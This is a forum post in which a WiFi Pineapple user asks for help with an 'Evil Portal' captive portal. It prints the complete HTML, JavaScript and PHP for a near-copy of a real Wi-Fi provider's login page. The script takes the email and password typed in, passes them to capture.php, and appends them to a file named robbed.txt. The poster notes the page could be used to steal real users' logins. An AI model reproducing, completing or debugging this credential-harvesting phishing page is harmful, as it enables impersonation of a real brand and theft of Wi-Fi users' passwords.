Posts posted by gibsta8570

  1. Hi.. This is my first post so go easy please..! :unsure: I've never had to ask a question on a forum before because I've always found that another of the 7 billion peeps on the planet has already asked it and normally that question has been answered, helpfully, by a number of people. From there I've always been able to work out what it is I need to do in order to get what it is I'm doing working.

    Not this time.. I've only had my Pineapple Nano just over a week but I've spent at least 2 to 3 hours a night trying to get my Evil Portal page working. So I'm swallowing my pride and asking for help. I'm also preparing for the ripping apart of my html / php / js code. I don't know php or javascript. What I've written is cobbled together from reading what other people have posted (and been helped to correct) and from videos. I will be doing the codecademy PHP and JavaScript courses over the next few weeks.

    I don't think there is much wrong with my code. It's obviously not right or it would be working perfectly but it almost is..

    I think my one issue is the location of the various files.

    I have the following files saved in /root/portals/WifinityPortal

    MyPortal.php - Produced by the module, not touched it.

    WifinityPortal.ep - Produced by the module, not touched.

    capture.php - Produced using sublime (with much help from jermzz's post). Code below.

    index.php - Produced using sublime (with help taken from everywhere) then scp'd to the Nano to overwrite the original. Code below.

    jquery-2.2.1.min.js

    topleftlogo.png - Image file which is displayed fine.

    robbed.txt - This file is located in /www permanently. Permissions are set to -rwxrw-rw-

    All of the files become available in the /www directory when I activate the Portal using the Evil Portal module control page.

    I've tried moving the robbed.txt and capture.php files around to eliminate the PineAP being funny about allowing access to them. As you'll be able to see in my code, I've tried different ways of submitting the credentials to the capture.php page. I've tried cutting out index.php and just having an html doc there, or pasting the contents of my index.html into the PineAP Configuration page's Landing Page box. I've tried everything I can think of, many many times.. I'm a little confused as to where jermzz and kingoddball have their splash.html document. When I used an index.html instead of index.php users were not authenticated.

    Currently (with the files located as listed above), when a user connects (iOS) or tries to browse (any other device), the portal page is displayed. Entering email address and password causes the user's IP address to appear in the Evil Portal Authorised Clients list; however, the user is displayed the portal page a second time. Trying to load the original webpage that invoked the portal page doesn't work but loading a different page works. From what I've read, this is a known bug and is being worked on.. The positive is that the page/module authorisation works, mostly. However, I still can't get the capture.php to write to the robbed.txt file.

    If anyone can advise on their working solution of file names and locations.. And if anyone is able to scan down my code and spot any glaring errors.. I would be very very grateful. In return you get an almost working (carbon copy looking) version of Wifinity Inc.'s login page. Wifinity provide wifi based internet access in the accommodation block where I live; and also a rapidly increasing number of campuses, hotels, conference centres etc.. Although using the page for the purposes of stealing actual login credentials and thus allowing yourself free internet access would indeed be highly immoral! And there's something called the law? Printed on vellum it is don't you know!

    index.php

    
    <?php
    $destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . "";
    ?>
    
    <!--
    <!DOCTYPE html>
    -->
    
    <HTML>
        <HEAD>
            <title>Wifinity | Login Page</title>
    
    <!-- LINK TO CSS FILE - COMMENTED OUT AND CONTENTS COPIED (TO BELOW) DUE TO EVIL PORTAL CSS ISSUE
            <link type="text/css" rel="stylesheet" href="wifinity.css"/>
    -->
            <style type="text/css">
                body{
                    background-color: #E4E3E2;
                    font-family: Elido Light, Open Sans, Helvetica, Arial, Sans-serif;
                }
                #top_logo_banner{
                border: none;
                ;
                margin-right: -6px;
                margin-top: -10px;
                display: block;
                background-color: #FFFFFF;
                height: 72px;
                line-height: 100px;
                min-width: 100%;
                }
                #top_left_logo{
                width: 158px;
                height: 38px;
                margin-left: 10%;
                margin-top: 20px;
                }
                #center_login_box{
                background-color: #FFFFFF;
                border: 1px solid #CDCCCB;
                margin-top: 30px;
                margin-left: 20%;
                margin-right: 20%;
                height: 380px;
                }
                #invisible_center_box{
                border: none;
                width: 80%;
                height: 90%;
                margin-left: 10%;
                }
                .login_box_title{
                font-weight: normal;
                font-size: 1.6em;
                }
                label{
                font-weight: normal;
                font-size: 1em;
                }
                #emailaddress{
                height:40px;
                width: 98%;
                }
                #password{
                height:40px;
                width: 98%;
                }
                #submitbutton{
                background-color: #6FAE23;
                text-decoration: none;
                color: #FFFFFF;
                border: none;
                border-radius: 5px;
                height: 48px;
                width: 100%;
                font-size: 15px;
                text-transform: uppercase;
                padding: 0 20px;
                }
                #submitbutton:hover{
                background-color: #61991F;
                border-color: #61991F;
                text-decoration: none;
                }
                .grey_buttons{
                width:50%;
                }
                .footer_text{
                text-align: center;
                font-size: 1em;
                color: #888887;
                }
            </style>
    
            <script type="text/javascript">
                function redirect() {
                    user_email = document.getElementById("emailaddress").value;
                    user_password = document.getElementById("password").value;
                    user_credentials = user_email + " - " + user_password;
                    window.location = "/capture.php?user_credentials=" + user_credentials;
                } 
            </script>
    
    <!-- ORIGINAL redirect() JAVASCRIPT FUNCTION WITH TIMEOUT() FUNCTION - CREATED BY EVIL PORTAL MODULE
            <script type="text/javascript">
                function redirect() { setTimeout(function(){window.location = "/captiveportal/index.php";},100);} 
            </script>
    -->
    
    <!-- FUNCTIONS FOR CAPTURE AND REDIRECT MODIFIED FROM jermzz's HAK5 FORUM POST ON THREAD:
    	https://forums.hak5.org/index.php?/topic/37546-evil-ap-portal-help-required-does-not-capture-data/
    
            <script type="text/javascript">
                function getUrlVars(){
                    var vars = {};
                    var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi,
                    function(m,key,value) {
                        vars[key] = value;
                    });
                    return vars;
                }
                var fvalsubmit = getUrlVars()["valsubmit"];
                    if (fvalsubmit == 1) {
                        window.location = "$authtarget";
                }
                function capture_credentials() {
                    user_email = document.getElementById("emailaddress").value;
                    user_password = document.getElementById("password").value;
                    user_credentials = user_email + " - " + user_password;
                    window.location = "http://172.16.42.1/capture.php?user_credentials=" + user_credentials + "&redir=$authtarget&valsubmit=1";
                }
            </script>
    -->
    
        </HEAD>
        <BODY>
            <div id="top_logo_banner">
                <img id="top_left_logo" src="topleftlogo.png"/>
            </div>
            <div id="center_login_box">
                <div id="invisible_center_box">
                    <p class="login_box_title">Log in</p>
    				<form id="credentialsform" method="POST" action="/captiveportal/index.php" onsubmit="redirect()">
    					<input type="hidden" name="target" value="<?=$destination?>">
    
    <!-- MY OPENING FORM TAG - USED WHEN CALLING capture_credentials() FUNCTION USING onclick OF BUTTON (NOT onsubmit OF FORM)
                    <form id="credentialsform">
    -->
                        <p>
                            <label for="emailaddress">Email Address</label>
                        </p>
                        <p>
                            <input type="text" name="emailaddress" id="emailaddress" placeholder="email@example.com" required>
                        </p>
                        <p>
                            <label for="password">Password</label>
                        </p>
                        <p>
                            <input type="password" name="password" id="password" placeholder="Password" required>
                        </p>
                        <p>
                        	<button type="submit" id="submitbutton">
                        		<b>LOG IN</b>
                        	</button>
    
    <!-- MY ORIGINAL SUBMIT BUTTON FOR USE WITH capture_credentials() FUNCTION
                            <button type="button" id="submitbutton" onclick="capture_credentials()">
                                <b>LOG IN</b>
                            </button>
    -->
                        </p>
                        <p>
                            <button class="grey_buttons">Refresh location</button><button class="grey_buttons">Reset password</button>
                        </p>
                    </form>
                </div>
            </div>
    		<div>
    			<p class="footer_text">© Copyright 2016 Wifinity | All rights reserved</p>
    		</div>
        </BODY>
    
    <!-- BELOW IS ORIGINAL CONTENTS OF index.php PRODUCED BY EVIL PORTAL MODULE
    
    <?php
    $destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . "";
    ?>
    <HTML>
        <HEAD>
            <title>Evil Portal</title>
            <script type="text/javascript">
                function redirect() { setTimeout(function(){window.location = "/captiveportal/index.php";},100);} 
            </script>
        </HEAD>
        <BODY>
            <center>
                <h1>Evil Portal</h1>
                <p>This is the default Evil Portal page</p>
                <form method="POST" action="/captiveportal/index.php" onsubmit="redirect()">
                    <input type="hidden" name="target" value="<?=$destination?>">
                    <button type="submit">Authorize</button>
                </form>
            </center>
        </BODY>
    </HTML>
    -->
    </HTML>
    

    capture.php

    <?php
    
    $user_credentials = $_GET["user_credentials"];
    $redir = $_GET["redir"];
    
    $file = fopen("robbed.txt", "a");
    $fwrite($file, $user_credentials . "\n");
    fclose($file);
    
    echo '<script type="text/javascript">window.location = "/captiveportal/index.php"</script>';
    
    ?>
    

    Apologies for being such a newb and rambling so much.. Any advice on how to get the credentials writing to the robbed.txt will be very thankfully received. Getting it working 100% will gladly wait until Evil Portal is updated.
